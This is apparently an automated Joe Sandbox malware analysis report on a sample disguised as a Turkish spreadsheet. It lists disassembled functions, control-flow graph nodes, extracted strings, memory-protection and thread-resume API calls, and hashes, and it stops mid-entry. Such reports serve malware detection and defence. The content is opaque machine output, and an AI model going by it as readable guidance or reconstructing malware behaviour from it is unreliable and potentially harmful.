861 311d68e 843->861 844->843 846 311d5c2-311d602 844->846 847 311d607-311d647 844->847 848 311d538-311d578 844->848 849 311d57d-311d5bd 844->849 846->861 847->861 848->861 849->861 866 311d76b-311d7fe 857->866 858->866 861->839 870 311d805-311d825 866->870 870->756
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TJbq$Te]q$paq$xb`q
                                                  • API String ID: 0-4160082283
                                                  • Opcode ID: 50372a54be8138ecd864ab7a606b9692dcfdcbf1ec5866d77c9ae2907b568b4d
                                                  • Instruction ID: 0afb0aa7c0e0795f336bdc4d333f2f9ab711003380b07d01191a1950ee7330ca
                                                  • Opcode Fuzzy Hash: 50372a54be8138ecd864ab7a606b9692dcfdcbf1ec5866d77c9ae2907b568b4d
                                                  • Instruction Fuzzy Hash: 3FA2C575A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E91CF40
                                                  Function 05B11D18 Relevance: 3.0, Strings: 2, Instructions: 542COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1727 5b11d18-5b11d39 1728 5b11d40-5b11dd8 call 5b12648 1727->1728 1729 5b11d3b 1727->1729 1733 5b11dde-5b11e15 1728->1733 1729->1728 1735 5b11e24 1733->1735 1736 5b11e17-5b11e22 1733->1736 1737 5b11e2e-5b11f00 1735->1737 1736->1737 1746 5b11f12-5b11f3d 1737->1746 1747 5b11f02-5b11f08 1737->1747 1748 5b125ad-5b125c9 1746->1748 1747->1746 1749 5b11f42-5b1206b 1748->1749 1750 5b125cf-5b125ea 1748->1750 1759 5b1207d-5b121cf 1749->1759 1760 5b1206d-5b12073 1749->1760 1768 5b121d1-5b121d5 1759->1768 1769 5b12228-5b1222f 1759->1769 1760->1759 1770 5b121d7-5b121d8 1768->1770 1771 5b121dd-5b12223 1768->1771 1772 5b123da-5b123f6 1769->1772 1775 5b1246a-5b124b9 1770->1775 1771->1775 1773 5b12234-5b12322 1772->1773 1774 5b123fc-5b12420 1772->1774 1799 5b123d6-5b123d7 1773->1799 1800 5b12328-5b123d3 1773->1800 1780 5b12422-5b12464 1774->1780 1781 5b12467-5b12468 1774->1781 1788 5b124cb-5b12516 1775->1788 1789 5b124bb-5b124c1 1775->1789 1780->1781 1781->1775 1792 5b12518-5b1258e 1788->1792 1793 5b1258f-5b125aa 1788->1793 1789->1788 1792->1793 1793->1748 1799->1772 1800->1799
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$8
                                                  • API String ID: 0-3186246319
                                                  • Opcode ID: 1479a3acad20de81e77c757f62117cecc9829d752cef1686bda691d596b3ac3d
                                                  • Instruction ID: 7bf25f3bd52444d9860015b796678dc899e7e4156045bb73849b047080bb599f
                                                  • Opcode Fuzzy Hash: 1479a3acad20de81e77c757f62117cecc9829d752cef1686bda691d596b3ac3d
                                                  • Instruction Fuzzy Hash: 5F42C375D016298BDB64DF69C890AD9F7B2BF89310F5486EAD40DA7250DB30AE81CF90
                                                  Function 03111BA8 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2276 3111ba8-3111bc2 2277 3111bc4-3111bc7 2276->2277 2278 3111bca-3111bd0 2277->2278 2279 3111bd2 2278->2279 2280 3111bd9 2278->2280 2281 3111e51-311205a 2279->2281 2282 3111ed4-3111f01 2279->2282 2283 3111e16-3111e24 2279->2283 2284 3111db9-3111dd8 2279->2284 2285 3111d78-3111d86 2279->2285 2286 3111e5b 2279->2286 2287 3111cda-3111cfc 2279->2287 2288 3111c5c-3111c60 2279->2288 2289 3111ebe-3111ec2 2279->2289 2290 3111e3e-3111e4c 2279->2290 2291 3111d61 2279->2291 2292 3111d01-3111d1b 2279->2292 2293 3111ea5-3111eb9 2279->2293 2294 3111f84-3111faf 2279->2294 2295 3111d66-3111d73 2279->2295 2296 3111da6-3111db4 2279->2296 2297 3111c49-3111c57 2279->2297 2298 3111c88 2279->2298 2299 3111c0b-3111c16 2279->2299 2300 3111d2b-3111d57 2279->2300 2280->2287 2280->2299 2281->2278 2309 3112060-3112065 2281->2309 2282->2278 2283->2278 2284->2278 2312 3111dde-3111de5 2284->2312 2285->2278 2311 3111e65-3111e6d 2286->2311 2287->2278 2302 3111c62-3111c73 2288->2302 2303 3111c8d-3111cd5 2288->2303 2289->2294 2301 3111ec8-3111ecf 2289->2301 2290->2278 2304 3111e29-3111e39 2291->2304 2292->2278 2305 3111d21-3111d26 2292->2305 2293->2278 2294->2278 2295->2278 2296->2278 2297->2278 2298->2304 2299->2278 2300->2278 2301->2278 2302->2278 2307 3111c79-3111c7e 2302->2307 2303->2277 2303->2287 2304->2278 2305->2278 2307->2278 2309->2278 2313 3111e75-3111e82 2311->2313 2312->2278 2313->2278
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $%
                                                  • API String ID: 0-2111875603
                                                  • Opcode ID: 56d42a6baab6cb5d49bcc2d74c493a28f2469dfd3d10e2b1a5190b40fe0ffd15
                                                  • Instruction ID: f696a60646a3e852e13db1fd92d7cd14584f230ff96c7c920b5cf8b4d707de6f
                                                  • Opcode Fuzzy Hash: 56d42a6baab6cb5d49bcc2d74c493a28f2469dfd3d10e2b1a5190b40fe0ffd15
                                                  • Instruction Fuzzy Hash: 3B71F7B8D4020ADFEF14CFA6D8447EEB7F1BB48304F11A629C106EA290EB795595CB19
                                                  Function 05B11D08 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$h
                                                  • API String ID: 0-3598783323
                                                  • Opcode ID: 759e184b6fce3b1a575d2858ddd4b89a86a0e191fa2aaa8a6f9347d92b79e9ef
                                                  • Instruction ID: fcfee1775ca3cb79a6ed6763da4c58c02577c02654378719c74c33747839883a
                                                  • Opcode Fuzzy Hash: 759e184b6fce3b1a575d2858ddd4b89a86a0e191fa2aaa8a6f9347d92b79e9ef
                                                  • Instruction Fuzzy Hash: 4071F771D006298BDB64DF6AC850BD9FBB2BF89310F54C2EAC50DA7254DB306A85CF51
                                                  Function 057E0040 Relevance: 2.3, Strings: 1, Instructions: 1081COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2
                                                  • API String ID: 0-450215437
                                                  • Opcode ID: 80def0393b642bb964e1cad34680c38d47c429fc2284fe6191e5c0566e982a9d
                                                  • Instruction ID: a76a60ae57176363ae1332c591c3e58f2462743c3f3c643eae0ba81b634a13aa
                                                  • Opcode Fuzzy Hash: 80def0393b642bb964e1cad34680c38d47c429fc2284fe6191e5c0566e982a9d
                                                  • Instruction Fuzzy Hash: E6C2B4B4A012288FDB65DF69C884B9DBBB5FF89300F1081EAD509AB355DB309E85CF40
                                                  Function 05AD8928 Relevance: 1.6, Strings: 1, Instructions: 376COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: 3ec67eeb65f198d2c52174c41a1e793ab00acbd9d69db104ad5f3b0cf171ea58
                                                  • Instruction ID: b5529cbc0bd63e93766313a5ed1847768766ccb812f50c3f685468404dacd3c6
                                                  • Opcode Fuzzy Hash: 3ec67eeb65f198d2c52174c41a1e793ab00acbd9d69db104ad5f3b0cf171ea58
                                                  • Instruction Fuzzy Hash: B0F1C674E06259CFDB24DF6AD884FA9FBF2BB49300F1085A9D40AA7255DB385D85CF20
                                                  Function 05AD8918 Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: 331116b01f7e97b230ca8da9330e2705cef395f9c93d718a8a3be4560d00ebb3
                                                  • Instruction ID: e7ef1313f1b0dbd06bbc38c8e791e3c83175ee005e92be960147f49bd1f08588
                                                  • Opcode Fuzzy Hash: 331116b01f7e97b230ca8da9330e2705cef395f9c93d718a8a3be4560d00ebb3
                                                  • Instruction Fuzzy Hash: BEF1D5B4E06259CFDB24DF6AD844FA9FBF2BB49300F1081A9D40AA7255DB385D85CF21
                                                  Function 05B14E48 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B14F05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: b355a3f533a89a4ba5aad6350f8fcadd28705d5cd68a09e16941d907e9ac99d0
                                                  • Instruction ID: 7e5a89c9e4c7952deb846a0b79b95e00fa20f899d73a06beb426a7575f144ec5
                                                  • Opcode Fuzzy Hash: b355a3f533a89a4ba5aad6350f8fcadd28705d5cd68a09e16941d907e9ac99d0
                                                  • Instruction Fuzzy Hash: C94177B9D042589BCF10CFAAD980ADEFBB5BB49310F10942AE819B7310D735A945CF68
                                                  Function 05B14E50 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B14F05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: 6d5b0534b2c481f7650afa9e27bf5a5bce49ec886c3df810f9dcf252bb4efadc
                                                  • Instruction ID: 92666c4390bd95e8cfabe7550374215a54b59ea51bb2b60397139409ad4a2de2
                                                  • Opcode Fuzzy Hash: 6d5b0534b2c481f7650afa9e27bf5a5bce49ec886c3df810f9dcf252bb4efadc
                                                  • Instruction Fuzzy Hash: 774166B9D042589BCF10CFAAD984A9EFBB5BB49310F10942AE819B7210D735A945CF68
                                                  Function 05B16380 Relevance: 1.6, APIs: 1, Instructions: 85nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(?,?), ref: 05B16416
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 65c4b5d96ed44716f88132e5ea36b2de4605318331f60b111ebd782c24d5d32b
                                                  • Instruction ID: 058ac307279b7a61939f44eb843eb09d41025d155ed41a46cf56cd66a10b10eb
                                                  • Opcode Fuzzy Hash: 65c4b5d96ed44716f88132e5ea36b2de4605318331f60b111ebd782c24d5d32b
                                                  • Instruction Fuzzy Hash: 573199B5D012189FCB10CFAAD984A9EFBF5FF49310F60942AE819B7200C735A945CFA4
                                                  Function 05B16388 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(?,?), ref: 05B16416
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 8a7ed3a18cc05b7807155bcd1fff1add4f40585218f3b52bf85240026f83bf52
                                                  • Instruction ID: 242f4cfd02ce42b45e76669e7a0a2a80ddef592dcdb594b762a8319121982d36
                                                  • Opcode Fuzzy Hash: 8a7ed3a18cc05b7807155bcd1fff1add4f40585218f3b52bf85240026f83bf52
                                                  • Instruction Fuzzy Hash: 2031AAB4D012189FCB10CFAAD980A9EFBF5FF49310F20942AE819B7200C735A945CFA4
                                                  Function 05AECF10 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: e57cdee763972dcfec8bf51484a99ed5a07bd08c436adf92e8e408006cc98e2c
                                                  • Instruction ID: 80e9dc07c3b29d0e39055ed7881a3fd3f371591ce6fe47f7791839f9c58741d2
                                                  • Opcode Fuzzy Hash: e57cdee763972dcfec8bf51484a99ed5a07bd08c436adf92e8e408006cc98e2c
                                                  • Instruction Fuzzy Hash: 16C1E270E06218CFDB24CFAAD884BADBBF2FB49304F5490A9D41AAB255DB745D85CF01
                                                  Function 05AECEFF Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 09b211d8aacf14c6331e450af112c5972021dbffd5fb58e1c28ec293edbafc3a
                                                  • Instruction ID: 11d82b98ddd90005e6b70b78c4f44c787250e50cb84e734ba7c3b86d7a469308
                                                  • Opcode Fuzzy Hash: 09b211d8aacf14c6331e450af112c5972021dbffd5fb58e1c28ec293edbafc3a
                                                  • Instruction Fuzzy Hash: 3FC1F470D06218CFDB24CFAAD884BADBBF2FB49304F5490A9D41AAB255DB755D85CF00
                                                  Function 05E3E048 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Ddq
                                                  • API String ID: 0-562783569
                                                  • Opcode ID: 4be9a1131f938a6f80140a570bd1528e32dcbfcaedb2ad778fa8d58e595e6c85
                                                  • Instruction ID: 13497c489b8f57af56650013b4c128ce0cb288e07f66062b63b1906cf7bd8ea7
                                                  • Opcode Fuzzy Hash: 4be9a1131f938a6f80140a570bd1528e32dcbfcaedb2ad778fa8d58e595e6c85
                                                  • Instruction Fuzzy Hash: F3D1CFB4A01218CFDB54DFA9D894A9DBBF2FF89300F1091A9D409AB365DB34AD81CF40
                                                  Function 05B1D8F9 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: a717238314e74af90bc1b5da6c7d7f8e37d1f0a0fd8608d2350a03bd39fcd29c
                                                  • Instruction ID: ae1114b0069836d4023f4e48564bcc87c292e02dd8ec32aa756837a5fefe7e16
                                                  • Opcode Fuzzy Hash: a717238314e74af90bc1b5da6c7d7f8e37d1f0a0fd8608d2350a03bd39fcd29c
                                                  • Instruction Fuzzy Hash: 31C1FA74906219CFDBA4CF29D945BA9B7F1FB49300F9080EAD80EA7254DB346E81CF54
                                                  Function 057ECCD8 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: 8c2f109c47cd7a4bb97754b266a3b5e948aecab11709db5f37dc795ed41841db
                                                  • Instruction ID: 93757bb2db8be580a881237078f8c958a00463f3d4963a2b13d7350fd93bad0f
                                                  • Opcode Fuzzy Hash: 8c2f109c47cd7a4bb97754b266a3b5e948aecab11709db5f37dc795ed41841db
                                                  • Instruction Fuzzy Hash: 22A1F3B4E05218CFDB25CFAAD485BADBBF6BB8D304F5080A9E40AA7255DB705D85DF00
                                                  Function 05B1DA32 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 22461d8e308d3f0f85edfd0c05a4029484ccdf5014d1f8ba0ce24913f85f0649
                                                  • Instruction ID: 2568736050bb8b1793746c04662902230a69562b9b2ffc18653034e195d13af8
                                                  • Opcode Fuzzy Hash: 22461d8e308d3f0f85edfd0c05a4029484ccdf5014d1f8ba0ce24913f85f0649
                                                  • Instruction Fuzzy Hash: E8C1D874902229CFDB64DF29D945BE9BBB2FB49300F5080EAD80EA7254DB356E81CF54
                                                  Function 057ECCCB Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: 6caa7b3df7e9bf68b2862bd56539d0c7d2a7f7367051eacd6e52e29262fc0c96
                                                  • Instruction ID: 31cffa69d3fc1b2b6bfdec1849ec2afbd65da34c1fd84745c25ca96e736c44f8
                                                  • Opcode Fuzzy Hash: 6caa7b3df7e9bf68b2862bd56539d0c7d2a7f7367051eacd6e52e29262fc0c96
                                                  • Instruction Fuzzy Hash: 54A103B4E01218CFDB24CFAAD885BADBBF6BB8D304F5080A9E409A7255DB705D85DF00
                                                  Function 05AD93C9 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: bcc79fba0e9714bef34ced7962d43da086e36ae00fef8a69c048a1f4d03979f0
                                                  • Instruction ID: 4a682c642133698ba96189b80b16e821cbddada19adea288f36de8a3fdb8b1aa
                                                  • Opcode Fuzzy Hash: bcc79fba0e9714bef34ced7962d43da086e36ae00fef8a69c048a1f4d03979f0
                                                  • Instruction Fuzzy Hash: DCA107B4E01208CFDB24DFAAD884BAEFBF2BB49314F508069D41AA7255DB759985CF10
                                                  Function 05B1966C Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C^[.
                                                  • API String ID: 0-1264493093
                                                  • Opcode ID: 7fbc65fe42e66207f6efecf3d4648979af6bc2ab9b23a7b4ed207b9fb83bd65f
                                                  • Instruction ID: 0a8d5f57398726b966bb5b68d73e8c7cc19e72852409eb758f93805a4f82fa5b
                                                  • Opcode Fuzzy Hash: 7fbc65fe42e66207f6efecf3d4648979af6bc2ab9b23a7b4ed207b9fb83bd65f
                                                  • Instruction Fuzzy Hash: CA815B74E06248CFDB54CF69D4A4BADBBF2FB4A304F5090A9E40AA7255DB346D81CF18
                                                  Function 03111C18 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 4885367eb0ef168cfbc5b4aa20ff235d07eeab9224770c0b292a8e40a2000936
                                                  • Instruction ID: e8cd1bab200d33b4c8ff50719604d3df94542524e670dd849bb8aed7b11d04c8
                                                  • Opcode Fuzzy Hash: 4885367eb0ef168cfbc5b4aa20ff235d07eeab9224770c0b292a8e40a2000936
                                                  • Instruction Fuzzy Hash: CE61E5B4D0021ADFEF14CFA5D8847EEFBF1BB48304F159229C106EA290EB795595CB29
                                                  Function 05E0121D Relevance: .5, Instructions: 519COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f1411edabbbf90124ce3b512e91eafd3d4851b2235b8604b8d6455ac8edaf29
                                                  • Instruction ID: c67cf2964b96433e9905eea3e66bef46baa3b71c011edfe661939086ee22e70f
                                                  • Opcode Fuzzy Hash: 2f1411edabbbf90124ce3b512e91eafd3d4851b2235b8604b8d6455ac8edaf29
                                                  • Instruction Fuzzy Hash: 45B11A74E06218CFDB58DFA9D884BADBBB2FB49300F10A0A9D449AB395DB345D85CF10
                                                  Function 057E142C Relevance: .5, Instructions: 471COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f0b7cc53f77b946ac8022dd67c770bb32579170e6af3335b75e93329ea3f3d2
                                                  • Instruction ID: b02b6a790d4bec2abf778bc030630300de99a7dcddde1b88e37107814eca039a
                                                  • Opcode Fuzzy Hash: 1f0b7cc53f77b946ac8022dd67c770bb32579170e6af3335b75e93329ea3f3d2
                                                  • Instruction Fuzzy Hash: 9632C474A452298FCB65DF28C984BA9BBB6FF48300F5081E9D50DA7365DB30AE81DF44
                                                  Function 05AEC190 Relevance: .4, Instructions: 364COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a66d5242a6714d64db5ab47606f86e9a35dff94747ece39fdcc620281da28a03
                                                  • Instruction ID: 2c29a7acb23321e5a8ad92fa462bbb15086455f4a8d19105a17332639cbd2c4f
                                                  • Opcode Fuzzy Hash: a66d5242a6714d64db5ab47606f86e9a35dff94747ece39fdcc620281da28a03
                                                  • Instruction Fuzzy Hash: EBF16974A06218CFDB14DFA9D964BADBBF2FF49314F1090AAD409AB291DB345E85CF10
                                                  Function 05AEC218 Relevance: .3, Instructions: 334COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2803c01b6cf0f23190b1ebe3bc1d969a1f34d3be9c650fba38f90942314f1150
                                                  • Instruction ID: d3ee07adedb07b0a0c917f3761905b883179953f8876ed18ce27ea4b38af6ef8
